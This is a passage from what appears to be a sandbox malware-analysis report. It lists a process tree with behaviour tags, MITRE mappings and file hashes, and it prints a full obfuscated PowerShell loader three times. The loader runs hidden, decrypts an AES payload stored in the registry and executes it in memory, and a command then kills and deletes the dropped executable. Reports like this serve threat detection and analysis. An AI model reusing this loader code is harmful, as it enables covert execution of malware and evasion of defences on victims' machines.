-join '').('gnirtSteG'[-1..-9] -join '')($oSnpH);$AarSr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2IqKtZxS/FqcdHbBUDZbWg==');$AarSr = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AarSr, 0, $AarSr.Length);$AarSr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AarSr);$jKHVk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bw7IB5l0nDJz4V/yoKrAmg==');$jKHVk = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jKHVk, 0, $jKHVk.Length);$jKHVk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jKHVk);$BvkGZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AF0yFBzJZFVK0sW/C+0yOA==');$BvkGZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BvkGZ, 0, $BvkGZ.Length);$BvkGZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BvkGZ);$KJTnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IzMxK6yRkvNAq3b86ckOZw==');$KJTnP = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KJTnP, 0, $KJTnP.Length);$KJTnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KJTnP);$TjsNY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XQk0rQ8HHWmKAJLDXLuouQ==');$TjsNY0 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY0, 0, $TjsNY0.Length);$TjsNY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY0);$TjsNY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('owtqeXTsnLcs3cgKbzagCA==');$TjsNY1 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY1, 0, $TjsNY1.Length);$TjsNY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY1);$TjsNY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2RVrgdRC9/qmCG1cuVpcPg==');$TjsNY2 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY2, 0, $TjsNY2.Length);$TjsNY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY2);$TjsNY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bl9qQJYdA2YNQzYMsVAcjg==');$TjsNY3 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY3, 0, $TjsNY3.Length);$TjsNY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY3);$qGrKR.Dispose();$pdyuP1.Dispose();$TSIUN = [Microsoft.Win32.Registry]::$BvkGZ.$jKHVk($TjsNY).$AarSr($qvqLZ);$yZizz=[string[]]$TSIUN.Split('\');$yPDZH=FCxri(pxzLS([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[1])));OSlRe $yPDZH (,[string[]] ('%*'));$QEiEV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[0]);$pdyuP = New-Object System.Security.Cryptography.AesManaged;$pdyuP.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$FYZzj = $pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')();$QEiEV = $FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QEiEV, 0, $QEiEV.Length);$FYZzj.Dispose();$pdyuP.Dispose();$NTbes = New-Object System.IO.MemoryStream(, $QEiEV);$DmFpj = New-Object System.IO.MemoryStream;$FsdiJ = New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::$TjsNY1);$FsdiJ.$KJTnP($DmFpj);$FsdiJ.Dispose();$NTbes.Dispose();$DmFpj.Dispose();$QEiEV = $DmFpj.ToArray();$soNjb = $LRYKC | IEX;$HlzxU = $soNjb::$TjsNY2($QEiEV);$rrXdx = $HlzxU.EntryPoint;$rrXdx.$TjsNY0($null, (, [string[]] ($FNruO)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4888
-
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1520).WaitForExit();[System.Threading.Thread]::Sleep(5000); function pxzLS($faFmv){ $pdyuP=[System.Security.Cryptography.Aes]::Create(); $pdyuP.Mode=[System.Security.Cryptography.CipherMode]::CBC; $pdyuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $pdyuP.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s='); $pdyuP.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw=='); $FYZzj=$pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')(); $KNYFp=$FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($faFmv, 0, $faFmv.Length); $FYZzj.Dispose(); $pdyuP.Dispose(); $KNYFp;}function FCxri($faFmv){ $NTbes=New-Object System.IO.MemoryStream(,$faFmv); $DmFpj=New-Object System.IO.MemoryStream; $FsdiJ=New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::Decompress); $FsdiJ.CopyTo($DmFpj); $FsdiJ.Dispose(); $NTbes.Dispose(); $DmFpj.Dispose(); $DmFpj.ToArray();}function OSlRe($faFmv,$leBfz){ $HlzxU=[System.Reflection.Assembly]::Load([byte[]]$faFmv); $rrXdx=$HlzxU.EntryPoint; $rrXdx.Invoke($null, $leBfz);}$pdyuP1 = New-Object System.Security.Cryptography.AesManaged;$pdyuP1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$qGrKR = $pdyuP1.('rotpyrceDetaerC'[-1..-15] -join '')();$TjsNY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d6Q+LrrhAwyK1uipjOqPxg==');$TjsNY = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY, 0, $TjsNY.Length);$TjsNY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY);$qvqLZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('69yeuXffs7ux/zA0YMGKH3dmXSz0P4vgJbmfiMXrzCM=');$qvqLZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qvqLZ, 0, $qvqLZ.Length);$qvqLZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qvqLZ);$FNruO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WyXwngz2uglRO6ZAcrg6Ag==');$FNruO = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FNruO, 0, $FNruO.Length);$FNruO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FNruO);$LRYKC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u823wux5O4Fbh5eDFp/+ca2kjBZPfjXdKRiYm5lEi1/uPVvdi4VTw3Skyjvq+xkGRh3uxdMK5Yl30J7OmCvscDDWsBj5l/abJMk7R3rtVFuMmO2mOI8eJ68DpzNoAWbwuQ8vVlvfanC/+gVlAdicm4rn+Kxx0kjBxYQkdhDX8XhlvH9ZzMTYkQh7CAVDqjxzKnDzYFw26lZKBQhJ3luRhFBABAcYg16uXMiNBWXm1Frbp6IbtOgcTJ6GmJT6oeUkTVubIhdaLB7VUJXskuFV2zuoBiAtc2u4ckc48tqLxmOJeVGxobT7YO+ZwoLAQ2B6CuhEmiJDGCKp8eDtuz1gb9zd988pQle6YLnHJpMVjNFOoRCNp14ETcLqZFSwo1TzN6HzbvND0c1LW97hv8uasfQXsb6Vx6v7acbKM+Gce90=');$LRYKC = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LRYKC, 0, $LRYKC.Length);$LRYKC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LRYKC);$oSnpH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nSzPWxfvLItLrY6odHpw1Q==');$oSnpH = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($oSnpH, 0, $oSnpH.Length);$oSnpH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($oSnpH);$AarSr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2IqKtZxS/FqcdHbBUDZbWg==');$AarSr = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AarSr, 0, $AarSr.Length);$AarSr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AarSr);$jKHVk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bw7IB5l0nDJz4V/yoKrAmg==');$jKHVk = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jKHVk, 0, $jKHVk.Length);$jKHVk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jKHVk);$BvkGZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AF0yFBzJZFVK0sW/C+0yOA==');$BvkGZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BvkGZ, 0, $BvkGZ.Length);$BvkGZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BvkGZ);$KJTnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IzMxK6yRkvNAq3b86ckOZw==');$KJTnP = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KJTnP, 0, $KJTnP.Length);$KJTnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KJTnP);$TjsNY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XQk0rQ8HHWmKAJLDXLuouQ==');$TjsNY0 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY0, 0, $TjsNY0.Length);$TjsNY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY0);$TjsNY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('owtqeXTsnLcs3cgKbzagCA==');$TjsNY1 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY1, 0, $TjsNY1.Length);$TjsNY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY1);$TjsNY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2RVrgdRC9/qmCG1cuVpcPg==');$TjsNY2 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY2, 0, $TjsNY2.Length);$TjsNY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY2);$TjsNY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bl9qQJYdA2YNQzYMsVAcjg==');$TjsNY3 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY3, 0, $TjsNY3.Length);$TjsNY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY3);$qGrKR.Dispose();$pdyuP1.Dispose();$TSIUN = [Microsoft.Win32.Registry]::$BvkGZ.$jKHVk($TjsNY).$AarSr($qvqLZ);$yZizz=[string[]]$TSIUN.Split('\');$yPDZH=FCxri(pxzLS([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[1])));OSlRe $yPDZH (,[string[]] ('%*'));$QEiEV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[0]);$pdyuP = New-Object System.Security.Cryptography.AesManaged;$pdyuP.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$FYZzj = $pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')();$QEiEV = $FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QEiEV, 0, $QEiEV.Length);$FYZzj.Dispose();$pdyuP.Dispose();$NTbes = New-Object System.IO.MemoryStream(, $QEiEV);$DmFpj = New-Object System.IO.MemoryStream;$FsdiJ = New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::$TjsNY1);$FsdiJ.$KJTnP($DmFpj);$FsdiJ.Dispose();$NTbes.Dispose();$DmFpj.Dispose();$QEiEV = $DmFpj.ToArray();$soNjb = $LRYKC | IEX;$HlzxU = $soNjb::$TjsNY2($QEiEV);$rrXdx = $HlzxU.EntryPoint;$rrXdx.$TjsNY0($null, (, [string[]] ($FNruO)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:60
-
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1520).WaitForExit();[System.Threading.Thread]::Sleep(5000); function pxzLS($faFmv){ $pdyuP=[System.Security.Cryptography.Aes]::Create(); $pdyuP.Mode=[System.Security.Cryptography.CipherMode]::CBC; $pdyuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $pdyuP.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s='); $pdyuP.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw=='); $FYZzj=$pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')(); $KNYFp=$FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($faFmv, 0, $faFmv.Length); $FYZzj.Dispose(); $pdyuP.Dispose(); $KNYFp;}function FCxri($faFmv){ $NTbes=New-Object System.IO.MemoryStream(,$faFmv); $DmFpj=New-Object System.IO.MemoryStream; $FsdiJ=New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::Decompress); $FsdiJ.CopyTo($DmFpj); $FsdiJ.Dispose(); $NTbes.Dispose(); $DmFpj.Dispose(); $DmFpj.ToArray();}function OSlRe($faFmv,$leBfz){ $HlzxU=[System.Reflection.Assembly]::Load([byte[]]$faFmv); $rrXdx=$HlzxU.EntryPoint; $rrXdx.Invoke($null, $leBfz);}$pdyuP1 = New-Object System.Security.Cryptography.AesManaged;$pdyuP1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$qGrKR = $pdyuP1.('rotpyrceDetaerC'[-1..-15] -join '')();$TjsNY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d6Q+LrrhAwyK1uipjOqPxg==');$TjsNY = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY, 0, $TjsNY.Length);$TjsNY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY);$qvqLZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('69yeuXffs7ux/zA0YMGKH3dmXSz0P4vgJbmfiMXrzCM=');$qvqLZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qvqLZ, 0, $qvqLZ.Length);$qvqLZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qvqLZ);$FNruO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WyXwngz2uglRO6ZAcrg6Ag==');$FNruO = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FNruO, 0, $FNruO.Length);$FNruO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FNruO);$LRYKC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u823wux5O4Fbh5eDFp/+ca2kjBZPfjXdKRiYm5lEi1/uPVvdi4VTw3Skyjvq+xkGRh3uxdMK5Yl30J7OmCvscDDWsBj5l/abJMk7R3rtVFuMmO2mOI8eJ68DpzNoAWbwuQ8vVlvfanC/+gVlAdicm4rn+Kxx0kjBxYQkdhDX8XhlvH9ZzMTYkQh7CAVDqjxzKnDzYFw26lZKBQhJ3luRhFBABAcYg16uXMiNBWXm1Frbp6IbtOgcTJ6GmJT6oeUkTVubIhdaLB7VUJXskuFV2zuoBiAtc2u4ckc48tqLxmOJeVGxobT7YO+ZwoLAQ2B6CuhEmiJDGCKp8eDtuz1gb9zd988pQle6YLnHJpMVjNFOoRCNp14ETcLqZFSwo1TzN6HzbvND0c1LW97hv8uasfQXsb6Vx6v7acbKM+Gce90=');$LRYKC = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LRYKC, 0, $LRYKC.Length);$LRYKC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LRYKC);$oSnpH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nSzPWxfvLItLrY6odHpw1Q==');$oSnpH = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($oSnpH, 0, $oSnpH.Length);$oSnpH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($oSnpH);$AarSr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2IqKtZxS/FqcdHbBUDZbWg==');$AarSr = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AarSr, 0, $AarSr.Length);$AarSr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AarSr);$jKHVk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bw7IB5l0nDJz4V/yoKrAmg==');$jKHVk = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jKHVk, 0, $jKHVk.Length);$jKHVk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jKHVk);$BvkGZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AF0yFBzJZFVK0sW/C+0yOA==');$BvkGZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BvkGZ, 0, $BvkGZ.Length);$BvkGZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BvkGZ);$KJTnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IzMxK6yRkvNAq3b86ckOZw==');$KJTnP = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KJTnP, 0, $KJTnP.Length);$KJTnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KJTnP);$TjsNY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XQk0rQ8HHWmKAJLDXLuouQ==');$TjsNY0 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY0, 0, $TjsNY0.Length);$TjsNY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY0);$TjsNY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('owtqeXTsnLcs3cgKbzagCA==');$TjsNY1 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY1, 0, $TjsNY1.Length);$TjsNY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY1);$TjsNY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2RVrgdRC9/qmCG1cuVpcPg==');$TjsNY2 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY2, 0, $TjsNY2.Length);$TjsNY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY2);$TjsNY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bl9qQJYdA2YNQzYMsVAcjg==');$TjsNY3 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY3, 0, $TjsNY3.Length);$TjsNY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY3);$qGrKR.Dispose();$pdyuP1.Dispose();$TSIUN = [Microsoft.Win32.Registry]::$BvkGZ.$jKHVk($TjsNY).$AarSr($qvqLZ);$yZizz=[string[]]$TSIUN.Split('\');$yPDZH=FCxri(pxzLS([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[1])));OSlRe $yPDZH (,[string[]] ('%*'));$QEiEV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[0]);$pdyuP = New-Object System.Security.Cryptography.AesManaged;$pdyuP.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$FYZzj = $pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')();$QEiEV = $FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QEiEV, 0, $QEiEV.Length);$FYZzj.Dispose();$pdyuP.Dispose();$NTbes = New-Object System.IO.MemoryStream(, $QEiEV);$DmFpj = New-Object System.IO.MemoryStream;$FsdiJ = New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::$TjsNY1);$FsdiJ.$KJTnP($DmFpj);$FsdiJ.Dispose();$NTbes.Dispose();$DmFpj.Dispose();$QEiEV = $DmFpj.ToArray();$soNjb = $LRYKC | IEX;$HlzxU = $soNjb::$TjsNY2($QEiEV);$rrXdx = $HlzxU.EntryPoint;$rrXdx.$TjsNY0($null, (, [string[]] ($FNruO)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5092 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:2368
-
-
C:\Windows\system32\PING.EXEPING localhost -n 85⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5420
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"5⤵
- Kills process with taskkill
PID:6108
-
-
C:\Windows\system32\attrib.exeATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"5⤵
- Views/modifies file attributes
PID:4940
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3548
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3732
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3896
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3864
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4976
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1000
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1980
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4780
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2212
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3408
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:384
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3596
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:3948
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3144
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:4488
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:4388
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:4428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:4132
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:2548
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:5844
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Hide Artifacts
2Hidden Files and Directories
1Hidden Window
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
